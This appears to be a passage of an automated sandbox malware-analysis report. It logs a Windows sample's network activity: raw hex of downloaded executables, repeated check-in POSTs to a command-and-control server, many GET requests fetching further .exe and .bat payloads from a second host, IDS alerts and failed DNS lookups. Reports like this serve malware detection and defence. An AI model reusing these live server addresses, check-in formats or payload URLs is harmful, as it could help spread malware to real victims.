00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:59:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 10 Mar 2025 18:11:02 GMTETag: "1d2000-63000e51ecee4"Accept-Ranges: bytesContent-Length: 1908736Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 30 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4c 00 00 04 00 00 19 18 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 18 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 17 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 62 74 61 65 79 75 68 00 10 1a 00 00 10 32 00 00 0c 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 65 6e 6a 65 62 63 6b 00 10 00 00 00 20 4c 00 00 04 00 00 00 fa 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4c 00 00 22 00 00 00 fe 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:59:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 08 Mar 2025 12:48:55 GMTETag: "9a6cc8-62fd429700e59"Accept-Ranges: bytesContent-Length: 10120392Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 99 dc 14 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 4a 48 00 00 b8 51 00 00 00 00 00 00 58 48 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 05 00 02 00 05 00 02 00 00 00 00 00 00 60 9c 00 00 04 00 00 d0 fe 9a 00 02 00 00 00 00 00 10 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 50 52 00 9e 00 00 00 00 e0 51 00 ac 55 00 00 00 b0 59 00 5b af 42 00 00 f0 55 00 ec b2 03 00 00 06 9a 00 c8 66 00 00 00 80 52 00 4c 65 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 52 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 f6 51 00 10 14 00 00 00 40 52 00 8e 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc 49 48 00 00 10 00 00 00 4a 48 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 82 07 00 00 60 48 00 00 84 07 00 00 4e 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 dc e5 01 00 00 f0 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ac 55 00 00 00 e0 51 00 00 56 00 00 00 d2 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 8e 0f 00 00 00 40 52 00 00 10 00 00 00 28 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 9e 00 00 00 00 50 52 00 00 02 00 00 00 38 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 70 02 00 00 00 60 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 6d 00 00 00 00 70 52 00 00 02 00 00 00 3a 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 44 65 03 00 00 80 52 00 00 66 03 00 00 3c 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 70 64 61 74 61 00 00 ec b2 03 00 00 f0 55 00 00 b4 03 00 00 a2 53 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /files/6098950268/cuFIzyH.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 35 33 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10155390101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5153162918/P2SXMuh.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 33 35 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10163520101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/541893478/0uzaP1a.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 36 33 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10166360101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5169948862/6z1l5Yn.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 30 35 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10168050101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/1431323958/8p5Lrev.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 30 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10168070101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5765828710/7T7bCyA.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 35 31 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10168510101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6989783370/ClhN6R8.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 37 35 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10168750101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6691015685/EJmAkGq.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 39 30 30 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10169000101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/teamex_support/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 39 36 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10169690101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 39 37 30 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10169700101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 39 37 31 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10169710101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 39 37 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10169720101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 39 37 33 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10169730101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 39 37 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10169740101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 39 37 35 30 31 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10169750121&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6989783370/ClhN6R8.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Mon, 10 Mar 2025 16:49:46 GMTIf-None-Match: "f4400-62fffc27738b8"
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 39 37 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10169760101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/6098950268/cuFIzyH.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Sun, 09 Mar 2025 15:29:56 GMTIf-None-Match: "1c8000-62fea87283677"
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 39 37 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10169770101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7098980627/mAtJWNv.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 39 37 38 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10169780101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/5419477542/ADFoyxP.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 39 37 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10169790101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7212159662/HmngBpR.exe HTTP/1.1Host: 176.113.115.7

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 176.113.115.7 176.113.115.7

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49693 -> 104.21.93.43:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49698 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49695 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49703 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49701 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49704 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49708 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49711 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 176.113.115.7:80 -> 192.168.2.6:49708
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49716 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49718 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49702 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49705 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49723 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49719 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49735 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49747 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49760 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49721 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49722 -> 104.21.95.8:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49774 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49729 -> 104.21.93.43:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49787 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49741 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49804 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49815 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49773 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49827 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49780 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49756 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49778 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49794 -> 104.21.93.43:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49858 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49808 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49810 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49874 -> 176.113.115.7:80

Source: unknown	DNS traffic detected: query: garagedrootz.top replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: arisechairedd.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: orangemyther.live replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: defaulemot.run replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: collapimga.fun replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: begindecafer.world replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: sterpickced.digital replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dawtastream.bet replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: foresctwhispers.top replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fostinjec.today replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: seizedsentec.online replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: quietswtreams.life replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: earthsymphzony.today replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: strawpeasaen.fun replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tracnquilforest.life replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: catterjur.run replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: starrynsightsky.icu replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: modelshiverd.icu replaycode: Name error (3)

Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1412Expect: 100-continueConnection: Keep-Alive
